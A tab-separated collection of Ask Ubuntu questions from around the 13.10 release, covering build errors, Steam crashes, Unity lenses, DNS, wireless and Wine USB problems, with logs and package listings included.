368404	'make ' command compiling errors	im trying to locally install a program which is written in c++ . i have downloaded the program and am attempting to use the `` make '' command to compile the program as the programs instructions dictate . however when i do i get this error : /usr/include/stdc-predef.h:30:26 : fatal error : bits/predefs.h : no such file or directory compilation terminated . looking around on the internet some people seem to address this problem by sudo apt-get install libc6-dev-i386 i checked to see if this package was installed and it was not . when i try to install it i get e : unable to locate package libc6-dev-i386 i have already run sudo apt get update im sure this is a rookie question but any help is appreciated , i 'm running 13.10 32-bit . update : i 've tried other suggestions i 've found on similar error . all i have managed is a different but similar error . here is what i get . geoffrey @ geoffrey-latitude-e6400 : /usr/local/src/trinityrnaseq_r2013_08_14 $ make using gnu compiler for inchworm and chrysalis cd inchworm & & ( test -e configure || autoreconf ) \ & & ./configure -- prefix=`pwd` & & make install checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for g++ ... g++ checking for c++ compiler default output file name ... a.out checking whether the c++ compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking for style of include used by make ... gnu checking dependency style of g++ ... gcc3 checking for library containing cos ... none required configure : creating ./config.status config.status : creating makefile config.status : creating src/makefile config.status : creating config.h config.status : config.h is unchanged config.status : executing depfiles commands make [ 1 ] : entering directory `/usr/local/src/trinityrnaseq_r2013_08_14/inchworm' making install in src make [ 2 ] : entering directory `/usr/local/src/trinityrnaseq_r2013_08_14/inchworm/src' if g++ -dhave_config_h -i . -i . -i.. -pedantic -fopenmp -wall -wextra -wno-long-long -wno-deprecated -m64 -g -o2 -mt fasta_entry.o -md -mp -mf `` .deps/fasta_entry.tpo '' -c -o fasta_entry.o fasta_entry.cpp ; \ then mv -f `` .deps/fasta_entry.tpo '' `` .deps/fasta_entry.po '' ; else rm -f `` .deps/fasta_entry.tpo '' ; exit 1 ; fi in file included from fasta_entry.hpp:4:0 , from fasta_entry.cpp:1 : /usr/include/c++/4.8/string:38:28 : fatal error : bits/c++config.h : no such file or directory # include < bits/c++config.h > ^ compilation terminated . make [ 2 ] : *** [ fasta_entry.o ] error 1 make [ 2 ] : leaving directory `/usr/local/src/trinityrnaseq_r2013_08_14/inchworm/src' make [ 1 ] : *** [ install-recursive ] error 1 make [ 1 ] : leaving directory `/usr/local/src/trinityrnaseq_r2013_08_14/inchworm' make : *** [ inchworm ] error 2
368405	new install of steam not running on new install of ubuntu 13.10	i tried purging steam , un-installing and reinstalling steam , deleting /home/.local/share/steam/appcache/ , deleting everything in /home/.local/share/steam/ and nothing helped . i installed ubuntu , then steam into it directly afterward . i installed steam from ubuntu software centre , launched it , it updated 206mb , then closed . when i tried to launch it again , it momentarily flashes the checking for update dialogue , then closes every time . then ( in an unrelated event ) ubuntu said some system updates are necessary and one of them was steam launcher . i did the update , tried to launch steam ; same story . really need help on this , as i did a complete re-isntall of ubuntu , then steam again and it did not help at all . here 's the log : user @ computer : ~ $ steam running steam on ubuntu 13.10 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 2297 with name 0eblobregistrymutex_313e4d748ee12691a95dde8913185f7e removing stale semaphore last operated on by process 2297 with name 0eblobregistrysignal_313e4d748ee12691a95dde8913185f7e removing stale semaphore last operated on by process 2297 with name 0emsteamengineinstance removing stale semaphore last operated on by process 2297 with name 0esteamenginelock gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 1030/115016 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) installing breakpad exception handler for appid ( steam ) /version ( 1381282832_client ) steam : an x error occurred x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 18 ( x_changeproperty ) value in failed request : 0x0 serial number of failed request : 105 xerror_handler : x failed , continuing uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20131030115012_1.dmp /home/user/.local/share/steam/steam.sh : line 717 : 2650 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-484ddae7-0b1c-4ae4-be84-42a9c2131030 thanks in advance .
368406	unable to remove some unity lenses	i removed the files , video , photos and friends lenses with the following command . sudo apt-get purge unity-lens-files unity-lens-video unity-lens-photos unity-lens-friends although the corresponding results have disappeared from dash , only the friends tab has been removed . there still are tabs for files , video and photos , albeit empty . how do i remove these empty tabs ? i use ubuntu 13.10 saucy salamander . i understand that this issue did n't exist in 12.04 . the directory structure of unity lenses seems to have changed from 12.04 to 13.10 . earlier the lenses were stored in /usr/share/unity/lenses/ . that is n't the case now , rendering this answer inappropriate : http : //askubuntu.com/a/120116/111720
368407	menu bar and launcher missing in new installation of ubuntu 13.04	i have just installed ubuntu 13.04 on my thinkpad laptop . i am missing the launcher and upper bar . i only found references to the same problem for upgrades , so i tried everything written here , here and here with no success . however , referring to the second link , i ran ccsm and found my ubuntu unity plugin unchecked . checking it required to also enable the opengl and so i did . but , apparently i am unable to enable the opengl . trying to enable it manually ... and the checkbox gets automatically unchecked after few seconds . please help . update : i have intel graphics driver , maybe the problem is specifically with it ? . i also tried running ccsm after logging using ctrl+alt+f1 like given here . i was able to enable opengl and the ubuntu unity plugin there , but still , no effect on my display , also after reboot .
368410	run ie 7 explorer	my web application is run at ie 7 . now is it possible to run this web application in ubuntu desktop using ie 7 ?
368412	how to configure screens in console or create screen configuration profiles ?	i have two monitors and integrated gpu ( intel速 hd graphics 4600 ) . it works fine for work or movies , but if i launch games in fullscreen mode - i get artifacts , glitches and so on . temporary disabling second monitor solve this problem , but then i have to enable it back , and set its properties manually ( by default , additional screen attaches its left-top corner to main monitor 's right-top corner , but i need it to be left-bottom and right-bottom corners ) . so i need some kind of automatization here . best option - tool to create and swap between some kind of config profiles . or , maybe , some console manipulations which i can put into script files would be fine too . ( ubuntu 13.04 , if it matters )
368413	uninstalled ubuntu	so i uninstalled ubuntu by creating another disc and running ubuntu on that disc and following the steps to install os uninstaller and remove it . that did n't take long , but now when i start my computer i get bootmgr error and i do n't know how to fix it . i searched for solution online but i do n't have any of the windows discs and i ca n't get onto windows to create one .
368420	ubuntu 13.10 does n't detect my android phone ( gingerbread )	i recently upgraded my ubuntu 13.04 to 13.10 , after the upgrade when i try to mount my phone 's disk ( fat fs ) , it does n't show up as a drive , the `` dmesg '' command shows `` unable to enumerate usb on port 3 '' , please help . ubuntu 13.04 detected the phone 's sd card with hiccups .
368422	13.10 reinstall unity	i broke my unity so i need to reinstall it , since i did n't find any information how to reinstall it on 13.10 i have to ask here . currently i 'm on gnome shell , maybe that 's relevant .
368429	inverse search in kile ( ubuntu 13.10 ) does n't work	after i upgraded to ubuntu 13.10 , inverse search from okular to kile stopped working . i did not change anything in my configuration of kile or okular : in kile : configure - > tools - > build - > select a tool - > pdflattex , choose a configuration for the tool pdflatex- > modern in okular : settings - > editor - > kile , command - > kile -- line % l is this a bug , does it affect other users , or am i just doing something wrong ?
368432	problems during upgrading to 13.10 from 13.04	i am a novice ubuntu user and 13.04 was my first experience with linux , now when i was upgrading from 13.04 to 13.10 using update manager , after fetching the data when it was installing updates , it asked me for replacing several config files . but i refused and instead asked to keep the old config file . during installation of samba4 there was some error and the upgrade aborted with a error message that `` update not successful , system may be in unstable state '' . what should i do now .
368433	ubuntu-touch reverse usb tethering	i 'm trying to get internet from my nexus 4 ubuntu-touch through the usb as described here : https : //wiki.archlinux.org/index.php/android_tethering ( this is for android ) what i can not accomplish is to see the usb as a network using ifconfig -a do i need to enable something on the ubuntu-touch for this ?
368435	how do i fix dns resolving which does n't work after upgrading to ubuntu 13.10 ( saucy )	after upgrade to 13.10 my dns resolving fails . it seems the dns servers which i get by dhcp ( lan ) are not used . i could temporary solve the problem by adding nameserver 8.8.8.8 to /etc/resolv.conf . but then the intranet hosts still can not be resolved . when clicking on the connection information menu item on the network indicator , the primary dns and the secondary dns are set correctly . but my computer seams not to use them . so my questions : what should i put into resolv.conf , if anything ? how to find out , which name servers my computer is querying ? where to look next , to find out , why name servers received by dhcp are not used ?
368437	how do i remap my ubuntu keyboard shortcuts to match osx ?	i 'm using ubuntu in virtualbox on mac . as i switch frequently , i would like to use the same shortcuts . please , does anyone know how to have the same shortcuts on ubuntu , as they are on mac ? specifically , i would like to copy , paste , select all , ... work with cmd+c , cmd+v , cmd+a , ... ( even in terminal - no ctrl+shift , just ctrl ) . i tried to change keyboard layout to apple laptop , but that did n't help .
368439	unable to install ubuntu desktop 13.10	good day , i am trying to perform a new install of ubuntu-desktop ( ubuntu-13.10-desktop-i386.iso ) using a usb . the machine boots into the usb however it starts alternating between a blank screen and a purple screen with the mouse cursor in the middle of the screen and eventually gives me the message/error below . when i hold down the shift key while its booting into the usb stick i get the menu with the options try ubuntu without installing , install ubuntu , check disc for defects , test memory , boot from first hard disk . the only two options that perform the function it should are check disc for defects and test memory . all other options alternate between a blank screen and purple screen and eventually the below message/error . i have read many pages on the below message/error but all seem to be related to a machine that is either been upgraded from another version with the os on the hdd therefore enabling them to perform many of the given fixes . i do n't have any os on the system and am trying to install for the first time . this machine used to have windows xp but that no longer works missing system files therefore i am trying to install ubuntu 13.10 . i have also tried installing using a dvd and that does the same . i have downloaded a new copy of ubuntu tested the checksum , tested the disk integrity all 100 % . in the install menu i receive after pressing shift , i select nomodeset and have also tried to enter in the bottom line of text vga=771 but still nothing same as before . message/error : the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . after clicking ok i receive another menu but any option i choose there i get a grey screen and then nothing . i am installing on a desktop pc system : mecer xtreme pentium 4 3015mhz , 500mb ddr ram remember i have no working os on the machine therefore i am not sure what to do , please assist .
368441	how do i add the messaging menu to the xfce-panel 4.10 ?	the following answer does n't work for me : how do i add the messaging menu to the xfce-panel ? in a fresh 12.04 xubuntu installation ( xfce 4.8 ) i can see the icon for messaging-menu , but in my 13.10 ( with xfce 4.10 ) there 's no messaging menu nor sound icon in indicator-plugin . all needed packages are installed . the messaging menu icon shows correcly in unity . edit : output of o dpkg -l | grep -e `` ^rc '' -e `` ^iu '' rc account-plugin-generic-oauth 0.10bzr13.03.26-0ubuntu1.1 amd64 gnome control center account plugin for single signon - generic oauth rc activity-log-manager 0.9.7-0ubuntu4 amd64 blacklist configuration user interface for zeitgeist rc activity-log-manager-control-center 0.9.7-0ubuntu4 all blacklist configuration for zeitgeist ( transitional package ) rc apache2.2-common 2.2.22-6ubuntu5.1 amd64 apache http server common files rc appmenu-gtk : amd64 12.10.3daily13.04.03-0ubuntu1 amd64 export gtk menus over dbus rc appmenu-gtk3 : amd64 12.10.3daily13.04.03-0ubuntu1 amd64 export gtk menus over dbus rc assogiate 0.2.1-5 amd64 editor of the mime file types database rc dconf-tools 0.16.1-1 all transitional dummy package rc exult 1.2-15.2 amd64 engine for ultima vii ( bg , fov , si , ss ) rc exult-studio 1.2-15.2 amd64 tools for editing and viewing exult games rc gadmin-bind 0.2.5-2 amd64 gtk+ configuration tool for bind9 rc gadmin-openvpn-client 0.1.2-4 amd64 gtk+ configuration tool for openvpn ( client ) rc gadmin-openvpn-server 0.1.5-3.1 amd64 gtk+ configuration tool for openvpn ( server ) rc gadmin-proftpd 1:0.4.2-1 amd64 gtk+ configuration tool for proftpd rc gadmin-rsync 0.1.7-1 amd64 gtk+ configuration tool for rsync rc gadmin-samba 0.3.2-0ubuntu1 amd64 gtk+ configuration tool for samba rc gnome-orca 3.10.1-0ubuntu0.1 all scriptable screen reader rc gnome-sudoku 1:3.8.1-1 all sudoku puzzle game for gnome rc gtk-doc-tools 1.19-0ubuntu2 all gtk+ documentation tools rc gwibber 3.6.0-0ubuntu2 amd64 open source social networking client for gnome rc iproute 1:3.10.0-1ubuntu1 all transitional dummy package for iproute2 rc jockey-common 0.9.7-0ubuntu15 all user interface and desktop integration for driver management rc latex-beamer 3.24-1 all latex class to produce presentations rc latex-xcolor 2.11-1.1 all easy driver-independent tex class for color rc lesstif2 : amd64 1:0.95.2-1.1 amd64 osf/motif 2.1 implementation released under lgpl rc lib32asound2 1.0.25-4 amd64 shared library for alsa applications ( 32 bit ) rc lib32z1 1:1.2.8.dfsg-1ubuntu1 amd64 compression library - 32 bit runtime rc libaio1 : amd64 0.3.109-3 amd64 linux kernel aio access library - shared library rc libbamf3-1 : amd64 0.4.0daily13.06.19~13.04-0ubuntu1 amd64 window matching library - shared library rc libboost-iostreams1.49.0 1.49.0-4 amd64 boost.iostreams library rc libboost-python1.53.0 1.53.0-6+exp3ubuntu8 amd64 boost.python library rc libbrlapi0.5 : amd64 4.4-8ubuntu4 amd64 braille display access via brltty - shared library rc libcamel-1.2-40 3.6.4-0ubuntu1.1 amd64 evolution mime message handling library rc libcolumbus0-0 0.4.0daily13.04.16~13.04-0ubuntu1 amd64 error tolerant matching engine - shared library rc libdconf-dbus-1-0 : amd64 0.16.1-1 amd64 simple configuration storage system - d-bus library rc libdns95 1:9.9.2.dfsg.p1-2ubuntu2.1 amd64 dns shared library used by bind rc libdw1 : amd64 0.157-1ubuntu1 amd64 library that provides access to the dwarf debug information rc libebackend-1.2-5 3.6.4-0ubuntu1.1 amd64 utility library for evolution data servers rc libedata-book-1.2-15 3.6.4-0ubuntu1.1 amd64 backend library for evolution address books rc libedata-cal-1.2-18 3.6.4-0ubuntu1.1 amd64 backend library for evolution calendars rc libedataserverui-3.0-4 3.6.4-0ubuntu1.1 amd64 gui utility library for evolution data servers rc libev4 1:4.11-1 amd64 high-performance event loop library modelled after libevent rc libfam0 2.7.0-17 amd64 client library to control the fam daemon rc libgnome-desktop-3-4 3.6.3-0ubuntu1 amd64 utility library for loading .desktop files - runtime files rc libgnome-keyring0 : i386 3.8.0-2 i386 gnome keyring services library rc libgnome-vfsmm-2.6-1c2a 2.26.0-1build1 amd64 c++ wrappers for gnomevfs ( shared library ) rc libgtksourceview-3.0-0 : amd64 3.6.3-0ubuntu1 amd64 shared libraries for the gtk+ syntax highlighting widget rc libgtkspell-3-0 3.0.0~hg20110814-1build1 amd64 spell-checking addon for gtk 's textview widget rc libgweather-3-1 3.6.2-0ubuntu1 amd64 gweather shared library rc libhal-storage1 0.5.14-8ubuntu1 amd64 hardware abstraction layer - shared library for storage devices rc libhal1 0.5.14-8ubuntu1 amd64 hardware abstraction layer - shared library rc libharfbuzz0 : amd64 0.9.13-1 amd64 opentype text shaping engine rc libharfbuzz0 : i386 0.9.13-1 i386 opentype text shaping engine rc libhd16 16.0-2.2 amd64 hardware identification system library rc libibus-1.0-0 : amd64 1.4.2-0ubuntu2 amd64 intelligent input bus - shared library rc libibus-1.0-0 : i386 1.4.2-0ubuntu2 i386 intelligent input bus - shared library rc libical0 0.48-2 amd64 icalendar library implementation in c ( runtime ) rc libimobiledevice3 1.1.4-1ubuntu6.2 amd64 library for communicating with the iphone and ipod touch rc libisc92 1:9.9.2.dfsg.p1-2ubuntu2.1 amd64 isc shared library used by bind rc libllvm3.1 : i386 3.1-2ubuntu2 i386 low-level virtual machine ( llvm ) , runtime library rc libllvm3.2 : amd64 1:3.2repack-7ubuntu1 amd64 low-level virtual machine ( llvm ) , runtime library rc libllvm3.2 : i386 1:3.2repack-7ubuntu1 i386 low-level virtual machine ( llvm ) , runtime library rc libmenu-cache2 0.4.1-0ubuntu1 amd64 lxde implementation of the freedesktop menu specification rc libpackagekit-glib2-14 : amd64 0.7.6-3ubuntu1 amd64 library for accessing packagekit using glib rc libphp5-embed 5.5.3+dfsg-1ubuntu2 amd64 html-embedded scripting language ( embedded sapi library ) rc libpkcs11-helper1 : amd64 1.09-1build1 amd64 library that simplifies the interaction with pkcs # 11 rc libpoppler28 : amd64 0.20.5-1ubuntu3 amd64 pdf rendering library rc libraw5 : amd64 0.14.7-0ubuntu1.13.04.2 amd64 raw image decoder library rc librhythmbox-core6 2.98-0ubuntu5 amd64 support library for the rhythmbox music player rc libsnmp15 5.4.3~dfsg-2.7ubuntu1 amd64 snmp ( simple network management protocol ) library rc libsyncdaemon-1.0-1 4.2.0-0ubuntu1 amd64 ubuntu one synchronization daemon library rc libthunar-vfs-1-2 1.2.0-3build2 amd64 legacy vfs abstraction used in xfce rc libtiff4 : amd64 3.9.7-2ubuntu1 amd64 tag image file format ( tiff ) library ( old version ) rc libubuntuoneui-3.0-1 4.1.2-0ubuntu1 amd64 ubuntu one widget library rc libunity-core-6.0-5 7.0.0daily13.06.19~13.04-0ubuntu1systray1 amd64 core library for the unity interface . rc libv8-3.8.9.20 3.8.9.20-2 amd64 v8 javascript engine - runtime library rc libva-drm1 : amd64 1.2.1-0ubuntu0~raring amd64 video acceleration ( va ) api for linux -- drm runtime rc libva-wayland1 : amd64 1.2.1-0ubuntu0~raring amd64 video acceleration ( va ) api for linux -- wayland runtime rc libwayland0 : amd64 1.0.5-0ubuntu1 amd64 wayland compositor infrastructure - shared libraries rc libwhoopsie-preferences0 0.9 amd64 ubuntu error tracker submission settings - shared library rc libxfcegui4-4 4.10.0-2 amd64 basic gui c functions for xfce4 rc libxml++2.6-2 2.36.0-2 amd64 c++ interface to the gnome xml library ( libxml2 ) rc linux-image-3.5.0-26-generic 3.5.0-26.42 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-3.8.0-14-generic 3.8.0-14.24 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-27-generic 3.8.0-27.40 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-28-generic 3.8.0-28.41 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-29-generic 3.8.0-29.42 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-30-generic 3.8.0-30.44 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-32-generic 3.8.0-32.47 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.5.0-26-generic 3.5.0-26.42 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-14-generic 3.8.0-14.24 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-27-generic 3.8.0-27.40 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-28-generic 3.8.0-28.41 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-29-generic 3.8.0-29.42 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-30-generic 3.8.0-30.44 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-32-generic 3.8.0-32.47 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc lxmenu-data 0.1.2-2 all lxde freedesktop.org menu specification rc mail-notification 5.4.dfsg.1-8 amd64 mail notification in system tray rc nvidia-310 319.49-0ubuntu1~raring~xup1 amd64 transitional package for nvidia-310 rc nvidia-319 319.49-0ubuntu1~raring~xup1 amd64 nvidia binary xorg driver , kernel module and vdpau library rc nvidia-settings-319 319.49-0ubuntu1~raring~xup1 amd64 tool for configuring the nvidia graphics driver rc openjdk-6-jre-headless : amd64 6b27-1.12.6-1ubuntu2 amd64 openjdk java runtime , using hotspot jit ( headless ) rc openvpn 2.2.1-8ubuntu3 amd64 virtual private network daemon rc pdfjam 2013.20130722-1 all tex live : transitional dummy package rc pgf 2.10-1 all tex portable graphic format rc php5-cli 5.5.3+dfsg-1ubuntu2 amd64 command-line interpreter for the php5 scripting language rc php5-readline 5.5.3+dfsg-1ubuntu2 amd64 readline module for php5 rc proftpd-basic 1.3.4a-4+nmu1 amd64 versatile , virtual-hosting ftp daemon - binaries rc prosper 1.00.4+cvs.2007.05.01-4 all latex class for writing transparencies rc squeeze 0.2.3-12build1 amd64 modern and advanced archive manager for xfce rc teamviewer 8.0.17147 amd64 teamviewer ( remote control application ) rc texlive-doc-base 2012.20120611-1 all tex live : tex live documentation rc texlive-extra-utils 2013.20130722-1 all tex live : tex auxiliary programs rc texlive-font-utils 2013.20130722-1 all tex live : graphics and font utilities rc texlive-generic-recommended 2013.20130722-1 all tex live : generic recommended packages rc texlive-latex-base 2013.20130722-1 all tex live : latex fundamental packages rc texlive-latex-base-doc 2013.20130722-1 all tex live : documentation files for texlive-latex-base rc texlive-latex-recommended 2013.20130722-1 all tex live : latex recommended packages rc texlive-latex-recommended-doc 2013.20130722-1 all tex live : documentation files for texlive-latex-recommended rc texlive-pstricks 2013.20130722-1 all tex live : pstricks rc texlive-pstricks-doc 2013.20130722-1 all tex live : documentation files for texlive-pstricks rc timidity 2.13.2-40.1 amd64 software sound renderer ( midi sequencer , mod player ) rc timidity-daemon 2.13.2-40.1 all runs timidity++ as a system-wide midi sequencer rc unity-common 7.0.0daily13.06.19~13.04-0ubuntu1systray1 all common files for the unity interface . rc whoopsie-preferences 0.9 amd64 system preferences for error reporting rc wine-mpg2splt-installer 0.8.6~ubuntu13.10.1 all wine-mpg2splt-installer provides a convient tool that downloads and installs all of the components necessary to run mpg2splt.ax under wine . rc wine-silverlight5.1-installer 0.8.6~ubuntu13.10.1 all wine-silverlight5.1-installer provides a convient tool that downloads and installs all of the components necessary to run silverlight 5.1 under wine . rc xfce-keyboard-shortcuts 4.11.0-0ubuntu1~ppa0.13.10.1 all xfce keyboard shortcuts configuration ( transitional package ) rc xfce4-notes 1.7.7-3ubuntu2 amd64 notes application for the xfce4 desktop rc xul-ext-calendar-timezones 1:24.0+build1-0ubuntu1 amd64 calendar extension for thunderbird ( transitional package ) rc zeitgeist-core 0.9.14-0ubuntu3 amd64 event logging framework - engine rc zeitgeist-datahub 0.9.14-0ubuntu3 amd64 event logging framework - passive logging daemon output of sudo dpkg -l | grep indicator ii banshee-extension-appindicator 2.4.0-2ubuntu1 all application indicator extension for banshee ii calendar-indicator 0.2.0-0extras13.10.1 all an indicator for google calendar ii gir1.2-appindicator3-0.1 12.10.1+13.10.20130920-0ubuntu2 amd64 typelib files for libappindicator3-1 . ii gir1.2-syncmenu-0.1 12.10.5+13.10.20131011-0ubuntu1 amd64 indicator for synchronisation processes status - bindings ii indicator-applet 12.10.2+13.10.20130924.2-0ubuntu1 amd64 gnome panel indicator applet ii indicator-applet-complete 12.10.2+13.10.20130924.2-0ubuntu1 amd64 clone of the gnome panel indicator applet ii indicator-applet-session 12.10.2+13.10.20130924.2-0ubuntu1 amd64 clone of the gnome panel indicator applet ii indicator-application 12.10.1daily13.01.25-0ubuntu1 amd64 application indicators ii indicator-application-gtk2 12.10.0.1-0ubuntu2 amd64 application indicators ii indicator-appmenu 13.01.0+13.10.20130930-0ubuntu1 amd64 indicator for application menus . ii indicator-bluetooth 0.0.6+13.10.20131016-0ubuntu1 amd64 system bluetooth indicator . ii indicator-datetime 13.10.0+13.10.20131023.2-0ubuntu1 amd64 simple clock ii indicator-keyboard 0.0.0+13.10.20131010.1-0ubuntu1 amd64 keyboard indicator ii indicator-messages 13.10.1+13.10.20131011-0ubuntu1 amd64 indicator that collects messages that need a response ii indicator-power 12.10.6+13.10.20131008-0ubuntu1 amd64 indicator showing power state . ii indicator-printers 0.1.7daily13.03.01-0ubuntu1 amd64 indicator showing active print jobs ii indicator-session 12.10.5+13.10.20131023.1-0ubuntu1 amd64 indicator showing session management , status and user switching ii indicator-sound 12.10.2+13.10.20131011-0ubuntu1 amd64 system sound indicator . ii indicator-sound-gtk2 12.10.0.1-0ubuntu2 amd64 system sound indicator . ii indicator-sync 12.10.5+13.10.20131011-0ubuntu1 amd64 indicator for synchronisation processes status ii indicator-weather 13.7.1 all indicator that displays weather information ii libappindicator0.1-cil 12.10.1+13.10.20130920-0ubuntu2 all cli bindings for libappindicator ii libappindicator1 12.10.1+13.10.20130920-0ubuntu2 amd64 application indicators ii libappindicator3-1 12.10.1+13.10.20130920-0ubuntu2 amd64 application indicators ii libindicate-gtk3 12.10.1-0ubuntu3 amd64 library for raising indicators via dbus - gtk+ bindings ii libindicate5 12.10.1-0ubuntu3 amd64 library for raising indicators via dbus ii libindicator-dev 12.10.2+13.10.20130913-0ubuntu2 amd64 panel indicator applet - library development files ii libindicator3-7 12.10.2+13.10.20130913-0ubuntu2 amd64 panel indicator applet - shared library ii libindicator3-dev 12.10.2+13.10.20130913-0ubuntu2 amd64 panel indicator applet - library development files ii libindicator7 12.10.2+13.10.20130913-0ubuntu2 amd64 panel indicator applet - shared library ii libsync-menu1 : amd64 12.10.5+13.10.20131011-0ubuntu1 amd64 indicator for synchronisation processes status - libraries ii python-appindicator 12.10.1+13.10.20130920-0ubuntu2 amd64 python bindings for libappindicator ii sni-qt : amd64 0.2.6-0ubuntu1 amd64 indicator support for qt ii sni-qt : i386 0.2.6-0ubuntu1 i386 indicator support for qt ii telepathy-indicator 0.3.1daily13.06.19-0ubuntu1 amd64 desktop service to integrate telepathy with the messaging menu . ii touchpad-indicator 0.9.5-0extras13.04.1 all an indicator for the touchpad ii xchat-gnome-indicator 0.3.11-0ubuntu4 amd64 xchat-gnome indicator plugin ii xchat-indicator 0.3.11-0ubuntu4 amd64 xchat indicator plugin ii xfce4-indicator-plugin 0.5.0-2ubuntu2 amd64 plugin to display information from applications in the xfce4 panel
368442	accessing hardware via usb by proprietary windows software using wine	i have this proprietary software that access some hardware using usb . over a year ago i tried to install it on a ubuntu os using wine ( the program is written for windows ) . the ui seemed to work just fine but it had no access to the usb port . back then i had to license a windows copy in order to get the job done . now , that windows version we where using is deprecated and it is not longer available and available versions cost trice as much . so it is time to give linux another try . how can i ensure that the usb is available for a wine application ? neither the application nor the hardware install any driver , the app just pool all available usb drivers and make a handshake if it recognizes that the hardware is present . i want to minimize the test cases before abandoning linux one more time . update i 've just tried again ( with the hope an upgrade was made from last year ) , and it is not working . the proprietary windows app is not finding the hardware .
368445	unexpected change in ubuntu 12.04 gui	why would ubuntu change as shown in the images below and how can i get it back the way it was ? i should also mention ubuntu freezes every so often which can only be resolved with a hard reboot . many thanks . from : to : output from gnome settings daemon : ( gnome-settings-daemon:2345 ) : gdk-warning ** : the program 'gnome-settings-daemon ' received an x window system error . this probably reflects a bug in the program . the error was 'badmatch ( invalid parameter attributes ) ' . ( details : serial 263 error_code 8 request_code 140 minor_code 30 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . )
368446	have terminal window & file explorer remember their last size and position	in ubuntu 13.10 i would like my terminal window to , by default , open with the same size and in the same position as last time . i would like similar behaviour for the file explorer . is this possible ? to clarify : i am not interested in persisting this across a reboot , but only within a session . ( i.e . this question is not relevant . )
368448	13.10 bcm4313 network problems after update	i have a problem with my network adapter after upgrading from 13.04 to 13.10 . the adapter works for literally several seconds after i establish the connection but then it looks as if it got clogged somehow . this is what i see amongst my devices : ~ $ lspci | grep -i wireless 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) ~ $ uname -a linux bubek 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:12:00 utc 2013 i686 i686 i686 gnu/linux ~ $ lsmod | grep 80211 lib80211_crypt_tkip 17387 0 lib80211 14040 2 wl , lib80211_crypt_tkip cfg80211 401436 1 wl now , how does is behave . let 's assume i connect to my wireless network and straight after i get connected i ping the default gw : ~ $ ping 10.1.0.1 ping 10.1.0.1 ( 10.1.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 10.1.0.1 : icmp_seq=1 ttl=64 time=226 ms 64 bytes from 10.1.0.1 : icmp_seq=4 ttl=64 time=222 ms 64 bytes from 10.1.0.1 : icmp_seq=7 ttl=64 time=260 ms 64 bytes from 10.1.0.1 : icmp_seq=11 ttl=64 time=265 ms 64 bytes from 10.1.0.1 : icmp_seq=16 ttl=64 time=117 ms from 10.1.0.16 icmp_seq=45 destination host unreachable from 10.1.0.16 icmp_seq=46 destination host unreachable what has happened over here ? is there any possibility i can get it working ? the only way i could write that post was that i used my phone and usb tethering : ) thanks for any tips in advance !
